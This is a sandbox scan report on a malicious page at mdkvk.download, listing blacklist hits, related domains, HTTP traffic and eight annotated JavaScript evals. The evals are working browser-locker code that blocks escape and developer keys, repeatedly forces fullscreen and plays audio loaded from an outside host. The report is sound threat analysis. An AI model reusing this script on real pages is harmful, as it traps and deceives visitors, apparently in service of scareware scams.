Overview

URL mdkvk.download/fritunes1/
IP 37.1.201.66
ASN AS50673 Serverius Holding B.V.
Location Netherlands
Report completed 2017-08-04 19:01:50 CEST
urlquery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata w/ Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2017-08-04 2 mdkvk.download/fritunes1/ Malware
2017-08-04 2 mdkvk.download/fritunes1/jquery.js Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 37.1.201.66

Date UQ / IDS / BL URL IP
2018-06-22 06:22:25 +0200
0 - 1 - 0 mdkmurzilka.accountant/ 37.1.201.66
2018-01-11 20:35:55 +0100
0 - 0 - 1 mdkvk.bid/ 37.1.201.66
2017-12-28 12:49:29 +0100
0 - 0 - 1 mdkbro.loan/ 37.1.201.66
2017-09-11 21:23:27 +0200
0 - 0 - 1 mdkmurzilka.loan/ 37.1.201.66
2017-09-08 22:01:51 +0200
0 - 0 - 1 mdkmurzilka.loan/ 37.1.201.66
2017-09-05 22:16:43 +0200
0 - 0 - 1 mdkmurzilka.racing/ 37.1.201.66
2017-08-25 12:52:32 +0200
0 - 0 - 3 frplnl.loan/deitunes 37.1.201.66
2017-08-25 09:49:00 +0200
0 - 0 - 1 mdkmurzilka.date/deitunes/ 37.1.201.66
2017-08-23 00:29:08 +0200
0 - 0 - 3 mdkmurzilka.review/deitunes 37.1.201.66
2017-08-22 22:29:29 +0200
0 - 0 - 2 mdkmurzilka.party/deitunes/ 37.1.201.66

Last 10 reports on ASN: AS50673 Serverius Holding B.V.

Date UQ / IDS / BL URL IP
2019-05-20 01:25:04 +0200
0 - 4 - 0 morpicert.pw/ 5.45.73.46
2019-05-20 00:58:54 +0200
0 - 0 - 3 informatie-over.nl/ 91.220.37.56
2019-05-20 00:49:27 +0200
0 - 0 - 11 frangipani.be/ 185.56.147.47
2019-05-20 00:49:01 +0200
0 - 0 - 1 7orus.org/ 5.45.71.231
2019-05-19 22:27:21 +0200
0 - 0 - 4 moffia.nl/ 185.116.164.6
2019-05-19 17:19:43 +0200
6 - 1 - 0 https://bivalencelyzlvvjol.xyz/19818/2797/ezn (...) 37.49.225.10
2019-05-19 10:49:22 +0200
0 - 0 - 0 Vipmax-tv.net 185.8.177.130
2019-05-19 10:47:25 +0200
0 - 0 - 0 gomovideo.com 185.8.177.130
2019-05-19 10:45:54 +0200
0 - 0 - 0 185.8.177.130 185.8.177.130
2019-05-19 03:55:22 +0200
0 - 2 - 1 theloadmoon.ltd/raz1.exe 185.14.29.156

No other reports on domain: .



JavaScript

Executed Scripts (18)


Executed Evals (8)

#1 JavaScript::Eval (size: 410, repeated: 1) - SHA256: b8937ed987c41447e7fe794db35c4ecaae8d027b3f9a48fe40689a64311f15e7

                                            // Sample #1: keyboard-suppression handlers, consistent with a browser-locker page.
                                            // Returning false from an on* handler cancels the key's default browser action.
                                            window.onkeydown = function(evt) {
        // keydown keyCode values: 27 Esc, 18 Alt, 123 F12, 85 'U', 9 Tab, 115 F4, 116 F5,
        // 112 F1, 114 F3, 17 Ctrl. These cover the usual ways out of the page or into
        // developer tools (Esc leaves fullscreen, F12 opens devtools, F5 reloads, Ctrl+U views source).
        if (evt.keyCode == 27 || evt.keyCode == 18 || evt.keyCode == 123 || evt.keyCode == 85 || evt.keyCode == 9 || evt.keyCode == 115 || evt.keyCode == 116 || evt.keyCode == 112 || evt.keyCode == 114 || evt.keyCode == 17) {
            return false;
        }
    };
    // For keypress events keyCode carries a character code: 123 is '{' and 117 is 'u'.
    window.onkeypress = function(evn) {
        if (evn.keyCode == 123 || evn.keyCode == 117) return false;
    };
                                    

#2 JavaScript::Eval (size: 323, repeated: 1) - SHA256: f805bd55ffd272422c8e74f0953a6affd88e770e058edc6488db3e747417c626

                                        // Sample #2: on keyup of F11 (122), Ctrl (17), Alt (18) or Enter (13), call
                                        // toggleFullScreen (defined in sample #7, not here; it only enters fullscreen when
                                        // the document is not already fullscreen) and inject an autoplaying <audio>
                                        // element into #sound that loads its source from the external host polariton.ad-l.ink.
                                        document.addEventListener('keyup', function(e) {
    if (e.keyCode == 122 || e.keyCode == 17 || e.keyCode == 18 || e.keyCode == 13) {
        toggleFullScreen();
        // Same audio URL is injected again in samples #3 and #8; each injection replaces #sound's content.
        document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
    }
}, false);
                                    

#3 JavaScript::Eval (size: 267, repeated: 1) - SHA256: d4697b1ebe7683afd51a70f3354aaea8ed131210563f495298c1d2c1667b7fe0

                                        // Sample #3: companion to sample #2 for the Esc key (27). Esc normally exits
                                        // fullscreen, so on keyup the page re-enters it via toggleFullScreen (sample #7)
                                        // and re-injects the autoplaying external audio into #sound.
                                        document.addEventListener('keyup', function(es) {
    if (es.keyCode == 27) {
        toggleFullScreen();
        document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
    }
}, false);
                                    

#4 JavaScript::Eval (size: 532, repeated: 1) - SHA256: 9b4aa32b6ee8f6da951ff72075972a13e0feedb60f0a95813300dae82c007b13

                                        // Sample #4: live clock. Renders local time and date as "H:MM:SS<br>D.M.YYYY"
                                        // into #timedisplay. Only minutes and seconds are zero-padded; hours, day and
                                        // month are not. Benign on its own; it dresses the page as a system dialog.
                                        function getDate() {
    var date = new Date();
    var hours = date.getHours();
    var minutes = date.getMinutes();
    var seconds = date.getSeconds();
    var day = date.getDate();
    var month = date.getMonth() + 1;  // getMonth() is zero-based
    var year = date.getFullYear();
    if (minutes < 10) {
        minutes = '0' + minutes;
    }
    if (seconds < 10) {
        seconds = '0' + seconds;
    }
    document.getElementById('timedisplay').innerHTML = hours + ':' + minutes + ':' + seconds + '<br>' + day + '.' + month + '.' + year;
}
// A delay of 0 re-renders as often as the browser's minimum timer interval allows.
setInterval(getDate, 0);
                                    

#5 JavaScript::Eval (size: 194, repeated: 1) - SHA256: fa7bb2f305a2c599655ebf5a2e8a90ad6d42e1cbafbddd96c6ee82f6e3ccb4fd

                                        // Sample #5: toggles the visibility of the element with id "world" between
                                        // display:none and display:block. No caller is visible among the listed evals.
                                        function hello() {
    var p = document.getElementById('world');
    if (p.style.display == 'none') {
        p.style.display = 'block';
    } else {
        p.style.display = 'none';
    }
}
                                    

#6 JavaScript::Eval (size: 82, repeated: 1) - SHA256: eaad64e38398ebd625a861d33eb6c215ad5cbfbb9c1733359272d20633292b36

                                        // Sample #6: unhides the element with the given id by forcing display:block.
                                        // Called from sample #8 to reveal 'mydiv' and 'mypanel' on the first click.
                                        function viewdiv(id) {
    var el = document.getElementById(id);
    el.style.display = "block";
}
                                    

#7 JavaScript::Eval (size: 523, repeated: 1) - SHA256: 50b0a678ce834ba30cb9d84636bf7376c03ce7d0bb2559cb270d657bd630fe0b

                                        // Sample #7: defines toggleFullScreen only when a global `key` equals the literal
                                        // 'jwsf72efuju2'. `key` is not set in any of the listed evals, so it presumably
                                        // comes from a script outside this listing. Because the declaration sits inside
                                        // the if body, the callers in samples #2, #3 and #8 depend on this branch having
                                        // run (block-level function hoisting is engine-dependent in sloppy mode).
                                        if (key == 'jwsf72efuju2') {
    // Despite the name this never exits fullscreen: it only requests it when no
    // element is currently fullscreen, using the vendor-prefixed API that exists.
    function toggleFullScreen() {
        if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
            if (document.documentElement.requestFullscreen) {
                document.documentElement.requestFullscreen();
            } else if (document.documentElement.mozRequestFullScreen) {
                document.documentElement.mozRequestFullScreen();
            } else if (document.documentElement.webkitRequestFullscreen) {
                document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
            }
        }
    }
}
                                    

#8 JavaScript::Eval (size: 502, repeated: 1) - SHA256: b5410693328b03022bf9114c99cbbc12b9bad402cb5d6d2bc803cea4c01c0607

                                        // Sample #8: on load, installs a document-wide click handler. The first click
                                        // (a user gesture, which fullscreen/autoplay require) enters fullscreen, sets a
                                        // not-allowed cursor, writes the global `stroka` as HTML into #map, reveals
                                        // #mydiv and #mypanel, and injects the autoplaying external audio.
                                        // `stroka` and `target` are not declared in any listed eval; `target` is an
                                        // implicit global assignment whose value is never used here.
                                        window.onload = function() {
    document.onclick = function(e) {
        e = e || event;  // IE fallback: window.event
        target = e.target || e.srcElement;
        toggleFullScreen();
        document.body.style.cursor = 'not-allowed';
        // innerHTML assignment: whatever `stroka` holds is parsed as markup.
        document.getElementById('map').innerHTML = stroka;
        viewdiv('mydiv');
        viewdiv('mypanel');
        document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
    }
}
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 281, repeated: 1) - SHA256: 9a189437219ed063381407a6a1f214ee9bcad766b6aa1203c9b5cc62987797b8

                                        <!-- Write #1: LiveInternet / counter.yadro.ru visitor-counter beacon. The img
                                             src matches the two counter.yadro.ru /hit requests under HTTP Transactions,
                                             which report back the referring URL (mdkvk.download/fritunes1/) and set
                                             FTID/VID cookies. The title text is mis-encoded in the capture and is kept
                                             as recorded. Spacing inside the tags is the beautifier's output. -->
                                        < a href = '//www.liveinternet.ru/click'
target = _blank > < img src = '//counter.yadro.ru/hit?t52.6;r;s1176*885*24;uhttp%3A//mdkvk.download/fritunes1/;0.18852702683245082'
alt = ''
title = 'LiveInternet: ?>:070=> G8A;> ?@>A<>B@>2 8 ?>A5B8B5;59 70 24 G0A0'
border = '0'
width = '88'
height = '31' > < /a>
                                    


HTTP Transactions (10)


Request Response
                                        
                                            GET /fritunes1/ HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         37.1.201.66
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Fri, 04 Aug 2017 17:01:15 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 03 Aug 2017 08:22:23 GMT
Etag: "dacd-555d5147fb03a"
Accept-Ranges: bytes
Content-Length: 56013
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  UTF-8 Unicode (with BOM) HTML document text, with very long lines, with CRLF line terminators
Size:   56013
Md5:    a9c098564cafcfc41b007485839ac9e6
Sha1:   b58caef436c89a90c41cf91b9b4ccae0a7b6cc3f
Sha256: 185b781d950c4efe607658e086a574401a10cf2156095945362d47b281d91baf

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /jquery-1.7.2.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://mdkvk.download/fritunes1/

                                         
                                         94.31.29.54
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Date: Fri, 04 Aug 2017 17:01:15 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 24 Oct 2014 00:16:07 GMT
Vary: Accept-Encoding
Etag: W/"54499a47-3dbd1"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000, public
Access-Control-Allow-Origin: *
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   90283
Md5:    468731fd6a2e4518a37e7b755641c263
Sha1:   a20455e3ea1779efbe2939459569dcfe8c1d96c4
Sha256: 5c4eb28734ecbefdf580a9affcc542f683a2e58a7258ee9ebe2751c2c97a4d57
                                        
                                            GET /extension/ow_miomcti_designs/design/miomcti_public/images/favicon.ico HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         37.1.201.66
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 04 Aug 2017 17:01:15 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Content-Length: 267
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   267
Md5:    a03eab71d3861fb15968dfb9e6d5862d
Sha1:   00dfe3b71395396032a31aeab31a9a39aba5ff3f
Sha256: ab376228eff229e46315af3b9e8483730be21c5d951eafb936ddd725e9c61181
                                        
                                            GET /fritunes1/jquery.js HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://mdkvk.download/fritunes1/

                                         
                                         37.1.201.66
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 04 Aug 2017 17:01:15 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 03 Aug 2017 08:22:23 GMT
Etag: "60ef6-555d5147fb03a"
Accept-Ranges: bytes
Content-Length: 397046
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII English text
Size:   397046
Md5:    f7e1fac3a114fec9741e577a0979768f
Sha1:   39b43426d5647f6a2ca428f5a9faf2b208cc87c5
Sha256: 5e45cd34bfa99e32b3d2ae95fb6acff64b95af728415941bc19ca2d95c699c8b

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /fritunes1/card.png HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://mdkvk.download/fritunes1/

                                         
                                         37.1.201.66
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Fri, 04 Aug 2017 17:01:15 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 03 Aug 2017 08:22:23 GMT
Etag: "d5d2-555d5147fb03a"
Accept-Ranges: bytes
Content-Length: 54738
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 325 x 194, 8-bit/color RGBA, non-interlaced
Size:   54738
Md5:    3d59f06b569819ef0c175bd61f9e3811
Sha1:   988386c3f551e1f04dda9c14c69b6ca4781af7ab
Sha256: 756e729d0091b46a7d684f8a125ed7d4b1d4cd8051f9835d7716b986ee95d048
                                        
                                            GET /fritunes1/alert.jpg HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://mdkvk.download/fritunes1/

                                         
                                         37.1.201.66
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Fri, 04 Aug 2017 17:01:16 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 03 Aug 2017 08:22:23 GMT
Etag: "6987-555d5147fac52"
Accept-Ranges: bytes
Content-Length: 27015
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   27015
Md5:    b2e4e13b76af202590a16546138ff72d
Sha1:   241b1be9a9a6b4c37628f470ea2affd34f9b7bcf
Sha256: 98b75e854f782ebb9b1d3c9e8c9de745e9ef2f8087f8fc2f619a8ddb4fdba62a
                                        
                                            GET /hit?t52.6;r;s1176*885*24;uhttp%3A//mdkvk.download/fritunes1/;0.18852702683245082 HTTP/1.1 
Host: counter.yadro.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://mdkvk.download/fritunes1/

                                         
                                         88.212.196.66
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
                                        
Date: Fri, 04 Aug 2017 17:01:16 GMT
Server: 0W/0.8c
Location: http://counter.yadro.ru/hit?q;t52.6;r;s1176*885*24;uhttp%3A//mdkvk.download/fritunes1/;0.18852702683245082
Content-Length: 32
Expires: Wed, 03 Aug 2016 21:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: FTID=1PXAXS2hg0fc1PXAXS005AaM; path=/; expires=Fri, 03 Aug 2018 21:00:00 GMT; domain=.yadro.ru


--- Additional Info ---
Magic:  HTML document text
Size:   32
Md5:    3e9c09a8c5a87f266e047a596f48578c
Sha1:   07d7b1940b7e3f9a3db43197458f9b8ef18a6bce
Sha256: 57fad7ae62012ff4a38ecb6045ac6e8e3a070a33bbd033b21ab6cad3566d9254
                                        
                                            GET /hit?q;t52.6;r;s1176*885*24;uhttp%3A//mdkvk.download/fritunes1/;0.18852702683245082 HTTP/1.1 
Host: counter.yadro.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://mdkvk.download/fritunes1/
Cookie: FTID=1PXAXS2hg0fc1PXAXS005AaM

                                         
                                         88.212.196.66
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Fri, 04 Aug 2017 17:01:16 GMT
Server: 0W/0.8c
Connection: Close
Content-Length: 362
Expires: Wed, 03 Aug 2016 21:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: VID=0AHvJQ2b2Ufc1PXAXS005AbR; path=/; expires=Fri, 03 Aug 2018 21:00:00 GMT; domain=.yadro.ru


--- Additional Info ---
Magic:  GIF image data, version 87a, 88 x 31
Size:   362
Md5:    7b25b20ac31706e7ca86a5ffd09c75d5
Sha1:   830c6230d01396292aa9c76f9579e3fd0ff8d000
Sha256: a73d6739819ba98621e4bdb24bc2fbc2c88583479558b9878e5b986d3b59341d
                                        
                                            GET /extension/ow_miomcti_designs/design/miomcti_public/images/favicon.ico HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         37.1.201.66
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 04 Aug 2017 17:01:16 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Content-Length: 267
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   267
Md5:    a03eab71d3861fb15968dfb9e6d5862d
Sha1:   00dfe3b71395396032a31aeab31a9a39aba5ff3f
Sha256: ab376228eff229e46315af3b9e8483730be21c5d951eafb936ddd725e9c61181
                                        
                                            GET /extension/ow_miomcti_designs/design/miomcti_public/images/favicon.ico HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         37.1.201.66
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 04 Aug 2017 17:01:18 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Content-Length: 267
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   267
Md5:    a03eab71d3861fb15968dfb9e6d5862d
Sha1:   00dfe3b71395396032a31aeab31a9a39aba5ff3f
Sha256: ab376228eff229e46315af3b9e8483730be21c5d951eafb936ddd725e9c61181